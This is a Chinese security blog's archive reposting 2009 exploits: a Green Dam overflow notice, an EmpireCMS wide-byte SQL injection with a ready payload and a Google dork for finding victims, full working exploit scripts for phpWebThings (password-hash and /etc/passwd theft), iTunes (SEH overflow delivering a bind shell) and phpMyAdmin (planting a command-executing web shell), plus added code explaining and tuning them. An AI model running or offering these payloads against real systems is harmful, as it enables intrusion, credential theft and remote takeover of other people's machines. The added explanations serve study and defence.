Archive for the "Network Security" category.

Green Dam 3.17 URL remote buffer overflow vulnerability and exploit download

      Green Dam remote buffer overflow vulnerability and exploit download
      Originally published at: http://milw0rm.com/exploits/8938
      A quick translation:
      Green Dam remote buffer overflow vulnerability
      "Green Dam" is software promoted by the Chinese government for monitoring and blocking pornography. After July 1, every new PC sold in China must have Green Dam installed. It already has 50 million users in China.
      To monitor the URLs a user is browsing, Green Dam injects itself into the browser process. When Green Dam tries to handle an over-long URL, a stack-based buffer overflow occurs inside the browser process.
      This vulnerability can be used to compromise an Internet Explorer that has Green Dam installed. I used the .NET library to write the code, because it is more reliable than heap spraying and can bypass DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization) on Vista.
      The exploit page contains a .NET control, so it should be hosted on IIS.
                        -- seer[N.N.U]
      Download: Green Dam remote buffer overflow exploit file

Please respect copyright when reposting; source: Qiutian Blog (秋天博客)
Permalink: https://www.cfresh.net/web-security/172

EmpireCMS (帝国CMS) guestbook vulnerability

      A 0day dropped by 深灰.
      Find a site running EmpireCMS and append to its URL: e/tool/gbook/?bid=1
      For example: www.xxx.com/e/tool/gbook/?bid=1
      This brings up the EmpireCMS guestbook. In the Name field enter: 縗\
      In the Contact email field enter:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
      Submit, and the account name and password are dumped.
      Testing method: search Google for the keyword inurl:e/tool/gbook/?bid=1, then leave a message as described above. The displayed result reveals the administrator account and the MD5 of the password; crack the hash and log in to the back end.
      Only the way to exploit the 0day was published, without any explanation of the principle behind it. Today I will take a shot at analyzing it with you.
      1. The vulnerability is a PHP SQL injection; you have already seen the injection statement above:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
      It queries the username, password and rnd columns of the phome_enewsuser table with the condition userid=1. The user ranked first is presumably the administrator; if the site has several administrators, replace 1 with another number.
      2. Why write 縗\ in the Name field?
      This involves a double-byte (wide-byte) vulnerability, and understanding it requires a few facts.
      1) Anyone who has set up a PHP environment knows the magic_quotes_gpc option in php.ini (queried from code with get_magic_quotes_gpc()).
      When it is on, every ' (single quote), " (double quote), \ (backslash) and NUL character in request data automatically gets the escape character \ prepended.
      With it on, strings can be written straight into the database.
      2) To inject we have to close the string literal with a quote. magic_quotes_gpc prepends \ to that quote, and \ is 0x5C (%5C) in hexadecimal. If we put the byte %df in front of the quote, what PHP hands to MySQL is %df%5c followed by the quote.
      But when MySQL reads those bytes under the GBK character set, it treats %df%5c as a single two-byte (wide) character, written here as 縗, and the quote that follows it is no longer escaped.
      To summarize:
      %df'  ==>  %df\'  ==>  %df%5c'  ==>  縗'
      This is the common wide-byte vulnerability in PHP, also called the double-byte vulnerability.
      During testing it replaces the usual and 1=1 probe:
      %df%27 or 1=1/*
      %df%27 or 1=2/*
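The byte sequence in step 2), worked through in code. This is an added example, not code from the post: a byte-wise addslashes() stands in for magic_quotes_gpc, a small walker models how a GBK-aware MySQL lexer scans a quoted literal (a valid two-byte character is skipped whole, a backslash skips exactly one byte), and a charset-aware escaper shows the fix: a lead byte that is not followed by a valid trail byte is escaped itself, so it can never pair up with the 0x5C that follows. The lexer, the escaper and the inputs are simplified models I constructed; none of it is PHP or MySQL code.

```python
# Added example (not from the original post): why %df' survives magic_quotes_gpc
# when the MySQL connection charset is GBK, and what a charset-aware escaper does.

ESCAPED = {0x27, 0x22, 0x5C, 0x00}          # ' " \ NUL: what magic_quotes_gpc escapes


def is_gbk_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE


def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0xFE and b != 0x7F


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like magic_quotes_gpc / addslashes(): it knows nothing
    about multibyte charsets, so it happily puts 0x5C right after a lead byte."""
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escape_gbk_aware(data: bytes) -> bytes:
    """Simplified model of a charset-aware escaper: a valid GBK pair is copied
    untouched, an orphan lead byte is escaped so it cannot pair with a later 0x5C."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if is_gbk_lead(b) and i + 1 < len(data) and is_gbk_trail(data[i + 1]):
            out += data[i:i + 2]
            i += 2
            continue
        if is_gbk_lead(b) or b in ESCAPED:
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)


def find_unescaped_quote(data: bytes) -> int:
    """Walk the bytes the way a GBK-aware SQL lexer walks the inside of a '...'
    literal; return the offset of the first quote that would close it, or -1."""
    i = 0
    while i < len(data):
        b = data[i]
        if is_gbk_lead(b) and i + 1 < len(data) and is_gbk_trail(data[i + 1]):
            i += 2                      # one two-byte character, skipped whole
        elif b == 0x5C:
            i += 2                      # backslash escapes exactly the next byte
        elif b == 0x27:
            return i                    # literal closed here: the injection point
        else:
            i += 1
    return -1


def as_gbk_text(data: bytes) -> str:
    """What the bytes look like once decoded as GBK (display only)."""
    return data.decode("gbk", errors="replace")


def demo() -> dict:
    # Constructed inputs: the wide-byte probe from the post (%df then a quote) and
    # an ordinary two-byte GBK character (0xB0A1) followed by a quote.
    probe = b"\xdf'"
    normal = b"\xb0\xa1'"
    naive = addslashes(probe)
    aware = escape_gbk_aware(probe)
    return {
        "naive_bytes": naive,                              # 0xDF 0x5C 0x27: DF5C pairs up
        "naive_quote_at": find_unescaped_quote(naive),     # 2: the quote is live
        "naive_as_text": as_gbk_text(naive),               # one wide character + "'"
        "aware_bytes": aware,                              # 0x5C 0xDF 0x5C 0x27
        "aware_quote_at": find_unescaped_quote(aware),     # -1: nothing to inject with
        "normal_quote_at": find_unescaped_quote(addslashes(normal)),  # -1: real GBK text is fine
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value!r}")
```

The naive path reports a live quote at offset 2 while the aware path reports none, and a genuine GBK character followed by a quote is safe under both, which is why the bug only shows up with a deliberately orphaned lead byte. Prepared statements, or setting the connection charset so the escaping function knows it is GBK, remove the problem at the source.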

      Here is the guestbook address of a certain hacker site:
      http://www.hackfield.com/e/tool/gbook/?bid=1
      Source: 普瑞斯特 (www.hacksb.cn)

Permalink: https://www.cfresh.net/web-security/173

phpWebThings <= 1.5.2 MD5 hash retrieval / file disclosure remote vulnerability

phpWebThings <= 1.5.2 MD5 hash retrieval / file disclosure remote vulnerability
Notes:
1. The vulnerability works regardless of php.ini settings;
2. wt_config.php contains the MySQL login.
Short explanation:
phpWebThings contains a flaw that lets an attacker carry out an SQL injection attack. The issue is due to the fdown.php script not properly sanitizing the user-supplied "id" variable, which may allow an attacker to inject or manipulate SQL queries in the backend database.

#!/usr/bin/perl
                                                                                    
###################################################################################################
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit                        #
#                                                                                                 #
# by staker                                                                                       #
# ——————————                                                                  #
# mail: staker[at]hotmail[dot]it                                                                  #
# url: http://phpwebthings.nl                                                                     #
# ——————————                                                                  #
#                                                                                                 #                        
# NOTE:                                                                                           #
# 1. it works regardless of php.ini settings                                                      #
# 2. wt_config.php contains mysql login                                                           #
#                                                                                                 #
# short explanation:                                                                              #
# —————————————————-                                            #
# phpWebThings contains a flaw that allows an attacker                                            #
# to carry out an SQL injection attack. The issue is                                              #
# due to the fdown.php script not properly sanitizing                                             #
# user-supplied input to the 'id' variable. This may                                              #
# allow an attacker to inject or manipulate                                                       #
# SQL queries in the backend database (php.ini indep)                                             #
# —————————————————-                                            #
#                                                                                                 #
# [file: fdown.php]                                                                               #
# ————————————                                                            #
#                                                                                                 #
# <?php                                                                                           #
# include_once("core/main.php");                                                                  #
#                                                                                                 #
# $ret = db_query("select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}"); #
# $row = db_fetch_array($ret);                                                                    #
# header('HTTP/1.1 200 OK');                                                                      #
# header('Date: ' . date("D M j G:i:s T Y"));                                                     #
# header('Last-Modified: ' . date("D M j G:i:s T Y"));                                            #
# header("Content-Type: application/force-download");                                             #
# header("Content-Lenght: " . (string)(filesize("var/forumfiles/{$row["file"]}")));               #
# header("Content-Transfer-Encoding: Binary");                                                    #
# header("Content-Disposition: attachment; filename={$row["file"]}");                             #
# readfile("var/forumfiles/{$row["file"]}");                                                      #
#                                                                                                 #
# ?>                                                                                              #
#                                                                                                 #
# ————————————-                                                           #
#                                                                                                 #
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1                                            #
# [*——————————————————————–*]                        #
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]                        #
# [*——————————————————————–*]                        #
# [* Usage: perl web.pl [target + path] [OPTIONS]                       *]                        #
# [*                                                                    *]                        #
# [* Options:                                                           *]                        #
# [* [files] -d ../../../../../../etc/passwd                            *]                        #
# [* [hash.] -c user_id                                                 *]                        #
# [* [table] -t set a table prefix (default: wt)                        *]                        #
# [*——————————————————————–*]                        #
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671                                                   #
#                                                                                                 #
# ----------------------------------------------------------                                      #
# Today is: 12 June 2009                                                                          #
# Location: Italy,Turin.                                                                          #  
# http://www.youtube.com/watch?v=E78BGajeuAI&feature=related                                      #
# ———————————————————-                                      #
###################################################################################################

use LWP::UserAgent;
use Getopt::Long;

&phpWebThings::init;

my ($files,$admin,$ua_lib,$domain,$table);

$domain  = $ARGV[0] || exit(0);

$ua_lib = LWP::UserAgent->new(
                               timeout      => 5,
                               max_redirect => 0,
                               agent        => 'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)',
                             ) || die $!;  

GetOptions(
           'p=s' => \$proxy,
           'd=s' => \$files,
           'c=i' => \$admin,
           't=s' => \$table,
         );
        

die(&phpWebThings::Exploit);
  

sub phpWebThings::Exploit()
{
       return Disclose::File($files) if defined $files;
       return Retrieve::Hash($admin) if defined $admin;
}      
              
      
sub Disclose::File
{
      my $filename = $_[0] || die $!;
      
      my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
      
      my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);
      
      if ($response->status_line =~ /^(302|200|301)/) {
            return $response->content;
      }
      else {
            return $response->as_string;
      }            
}
      
sub Retrieve::Hash()
{
       my $user_id = $_[0] || die $!;
        
       my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
      
       my $prefix = (defined $table) ? $table : 'wt';
            
       my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1 UNION Select password FROM ${prefix}_users Where uid=$user_id#" ]);    
      
      if ($response->status_line =~ /^(302|200|301)/)
      {
            if ($response->content =~ /([0-9a-f]{32})/) {
                  return "[* MD5 Hash: $1\n";
            }        
      }
      else {
            return $response->as_string;
      }                          
}
          

sub Hex::convert()
{
       my $string = shift @_ || die $!;
      
       return unpack("H*",$string);
}      
        
      
sub parse::URL()
{
        my $string = shift @_ || die($!);
        
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        }
        
        return $string;

}

sub phpWebThings::init
{
       print  "[*——————————————————————–*]\n".
              "[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]\n".
              "[*——————————————————————–*]\n".
              "[* Usage: perl web.pl [target + path] [OPTIONS]                       *]\n".
              "[*                                                                    *]\n".
              "[* Options:                                                           *]\n".
              "[* [files] -d ../../../../../../etc/passwd                            *]\n".
              "[* [hash.] -c user_id                                                 *]\n".
              "[* [table] -t set a table prefix (default: wt)                        *]\n".
              "[*——————————————————————–*]\n";
}  

# milw0rm.com [2009-06-12]

Permalink: https://www.cfresh.net/web-security/175

Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack  canary protection. Increasing buffer  size leads to
# SEH overwrite but it seems that the Access Violation needed to get  our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# – the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# – the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the  vulnerability from  Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>

from socket import *

html = """
<html>
  <head><title>iTunes loading . . .</title>
  <script>
   function openiTunes(){document.location.assign("itms://itunes.apple.com/");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
    prepareStack();
    ownSeh();
   }
   function main() {
    openiTunes();
    // Increase this timeout if your iTunes takes more time to load!
    setTimeout('ipwn()',20000);
   }
  </script>
  </head>
  <body onload="main();">
    <p align="center">
    <b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>
    </p>
    <p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>
    <p align="center"><b>www.offensive-security.com</b></p>
    <p align="center">
    iTunes starting… wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444 :)<br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    function.
    <br/>
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    </h2>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!</br>
    </p>
    </p>
  </body>
</html>"""

# Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode  is modified
# in order to obtain register alignment and to  reset ESP and EBP we  mangled
# before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
             "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
             "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
             "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
             "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
             "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
             "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
             "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
             "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
             "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
             "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
             "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570                                  

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin… Point EBP to encoded jmp                                                              
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
                   "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3          = "\x43"*162                                  

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/"
url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
                               align_for_jmp + jmp_back + pad0x3
payload         = html % (url1, url2)

print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()

# milw0rm.com [2009-06-12]
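A validation pass for the constraints the exploit above states in its own comments (pure printable ASCII, 0x40 and 0x60 as badchars, fixed region sizes), as an added example that is not part of the original exploit. It rebuilds the itpc:// buffer from the same region sizes with a caller-supplied shellcode, reports where nSEH and the handler address land, and lists every byte that would break the URI. The 730-byte placeholder shellcode in the demo is constructed filler, not the Alpha2 payload.

```python
# Added example (not from the original exploit): check the printable-ASCII and
# badchar constraints the exploit relies on, and where nSEH / SEH land in the
# itpc:// buffer given the region sizes used above.

PRINTABLE = set(range(0x20, 0x7F))   # space .. '~'
BADCHARS = {0x40, 0x60}              # from the exploit's shellcode comment


def printable_violations(data: bytes) -> list:
    """Return (offset, byte) for every byte that is not printable ASCII or is a badchar."""
    return [(i, b) for i, b in enumerate(data) if b not in PRINTABLE or b in BADCHARS]


def build_uri(shellcode: bytes, ret: bytes = b"\x2a\x5e\x21\x67") -> dict:
    """Rebuild the exploit's itpc:// buffer from its region sizes and record the
    offset of every region. The default `ret` is the QuickTime.qts ADD ESP,8; RETN
    address from the script; `shellcode` is whatever the caller supplies."""
    pad0x1 = b"\x41" * 425
    align = b"\x61" * 45 + b"\x54\x5a" + b"\x42" * 6 + b"V" * 10
    pad0x2 = b"\x41" * 570
    align_for_jmp = b"\x61\x45\x45\x45" + ret + b"\x44" + b"\x45" * 7
    jmp_back = (b"UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
                b"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
    pad0x3 = b"\x43" * 162
    regions = [("pad0x1", pad0x1), ("align", align), ("shellcode", shellcode),
               ("pad0x2", pad0x2), ("align_for_jmp", align_for_jmp),
               ("jmp_back", jmp_back), ("pad0x3", pad0x3)]
    offsets, pos = {}, 0
    for name, chunk in regions:
        offsets[name] = pos
        pos += len(chunk)
    body = b"".join(chunk for _, chunk in regions)
    # nSEH is the first dword of align_for_jmp; the handler pointer (ret) follows it
    offsets["nseh"] = offsets["align_for_jmp"]
    offsets["seh"] = offsets["align_for_jmp"] + 4
    return {"uri": b"itpc://:" + body, "body": body, "offsets": offsets}


def check(shellcode: bytes) -> dict:
    """Summarise the layout and any bytes that would break the URI."""
    built = build_uri(shellcode)
    return {
        "length": len(built["body"]),
        "nseh": built["offsets"]["nseh"],
        "seh": built["offsets"]["seh"],
        "violations": printable_violations(built["uri"]),
    }


if __name__ == "__main__":
    # Constructed placeholder of the same size as the exploit's 730-byte shellcode
    print(check(b"X" * 730))
```

With the sizes in the script, nSEH sits at offset 1788 of the path and the handler pointer at 1792; any shellcode that the check flags (a 0x40 or 0x60, or anything outside 0x20..0x7E) has to go back through the encoder before it is worth testing against iTunes.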

Permalink: https://www.cfresh.net/web-security/176

Security vulnerability found in Green Dam; users warned to guard against hacker attacks

  On June 12 foreign researchers found a security vulnerability in the "Green Dam Youth Escort" software. The flaw lies in Green Dam's filtering function: with filtering enabled, opening a specially crafted web page triggers a buffer overflow in the relevant Green Dam module.

  According to the report, a hacker exploiting this overflow can spread malware through "web page trojan" (drive-by download) pages, and an infected computer is at serious risk of data leakage or remote control by the attacker.

  Reportedly, 50 million users have already installed "Green Dam Youth Escort" by one route or another, which means at least 50 million users could be attacked or turned into bots ("broiler chickens") in a hacker's hands.

  After studying it, domestic anti-virus experts confirmed that "Green Dam Youth Escort" does have the vulnerability and recommended that the Green Dam developers release a patch as soon as possible. Until a patch is available, users can disable Green Dam's filtering function.
  Blogger 0point's comment: now that someone abroad has found this vulnerability, exploit code and tools will surely appear domestically before long, and a program meant to keep minors safe online will turn its host computers into bots. Parents, take note.

  Related link
  Green Dam Youth Escort software cracked; password can be bypassed

Permalink: https://www.cfresh.net/web-security/177

phpMyAdmin (/scripts/setup.php) PHP code injection

      This exploit code was tested successfully in the following environments:
      phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1;
      Linux kernel 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);
      Attack requirements:
      phpMyAdmin version: 2.11.x before 2.11.9.5, or 3.x before 3.1.3.1;
      The vulnerability only works against phpMyAdmin installations configured with the setup wizard, not those configured manually;
      The administrator must not have deleted the "/config/" subdirectory under the "/phpMyAdmin/" directory, because that is where "/scripts/setup.php" tries to create the "config.inc.php" file into which the PHP code below is injected.

#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    exit
fi

if ! which curl >/dev/null
then
    echo "sorry but you need curl for this script to work!"
           echo "on Debian/Ubuntu: sudo apt-get install curl"
           exit
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

    flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
    
    echo "[+] attempting to inject phpinfo() …"
    curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

    if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    then
        curl -ks --url "$3/config/config.inc.php" >$flag
        echo "[+] success! phpinfo() injected successfully! output saved on $flag"
        curl -ks -b $2 -d "$postdata2" --url "$3/scripts/setup.php" >/dev/null
        echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
        echo "    $3/config/config.inc.php?c=ls+-l+/"
        echo "    $3/config/config.inc.php?p=phpinfo();"
        echo "    please send any feedback/improvements for this script to"\
        "unknown.pentester<AT_sign__here>gmail.com"
    else
        echo "[+] no luck injecting to $3/config/config.inc.php :("
        exit
    fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided …"

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
    length=`echo -n $token | wc -c`

    # valid form token obtained?
    if [[ $length -eq 32 ]]
    then
        echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
        # attempt exploit!
        exploit $token $cookiejar $1
    else
        echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
        exit
    fi
else
    echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    exit
fi

# milw0rm.com [2009-06-09]
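What the serialized `configuration` value in the two POST bodies above actually does, as an added example that is not from the script or from phpMyAdmin. It re-creates the first payload with a minimal PHP serialize() writer, then feeds the resulting array to a deliberately simplified stand-in for a setup.php-style config writer that interpolates the array key into `$cfg['Servers'][$i]['...']` without escaping, and beside it a version that allow-lists keys. The writer, the key regex and the CLEAN_CONFIG sample are my assumptions, not phpMyAdmin's code.

```python
# Added example (not from the exploit or from phpMyAdmin): reproduce the serialized
# "configuration" value the script posts and show why an array key of
# host']=''; phpinfo();// turns into PHP code in the generated config.inc.php.
import re


def php_serialize(value) -> str:
    """Minimal PHP serialize() for str/int/bool/list/dict (the shapes the payload uses)."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(type(value))


def php_literal(value) -> str:
    """Render a scalar as a PHP literal; strings get addslashes-style escaping."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_config(config: dict) -> str:
    """Vulnerable writer (stand-in, not phpMyAdmin's): the key goes into the
    source text verbatim, so a key containing '] = ...; closes the index and
    continues as code. Only the value is escaped."""
    lines = ["<?php", "$i = 0;"]
    for server in config["Servers"]:
        lines.append("$i++;")
        for key, val in server.items():
            lines.append(f"$cfg['Servers'][$i]['{key}'] = {php_literal(val)};")
    lines.append("?>")
    return "\n".join(lines)


KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")   # assumed allow-list for option names


def render_config_hardened(config: dict) -> str:
    """Same writer with an allow-list on keys: anything that is not a plain
    identifier is refused before a single line of PHP is generated."""
    for server in config["Servers"]:
        for key in server:
            if not KEY_RE.match(key):
                raise ValueError(f"refusing config key {key!r}")
    return render_config(config)


def injection_rejected(config: dict) -> bool:
    try:
        render_config_hardened(config)
    except ValueError:
        return True
    return False


# The first request the script sends, decoded from its URL-encoded form
INJECTED_CONFIG = {"Servers": [{
    "host']=''; phpinfo();//": "localhost",
    "extension": "mysqli",
    "connect_type": "tcp",
    "compress": False,
    "auth_type": "config",
    "user": "root",
}]}

# Constructed benign configuration for comparison
CLEAN_CONFIG = {"Servers": [{"host": "localhost", "extension": "mysqli", "user": "root"}]}


if __name__ == "__main__":
    print(php_serialize(INJECTED_CONFIG))
    print(render_config(INJECTED_CONFIG))
    print("hardened writer rejects it:", injection_rejected(INJECTED_CONFIG))
```

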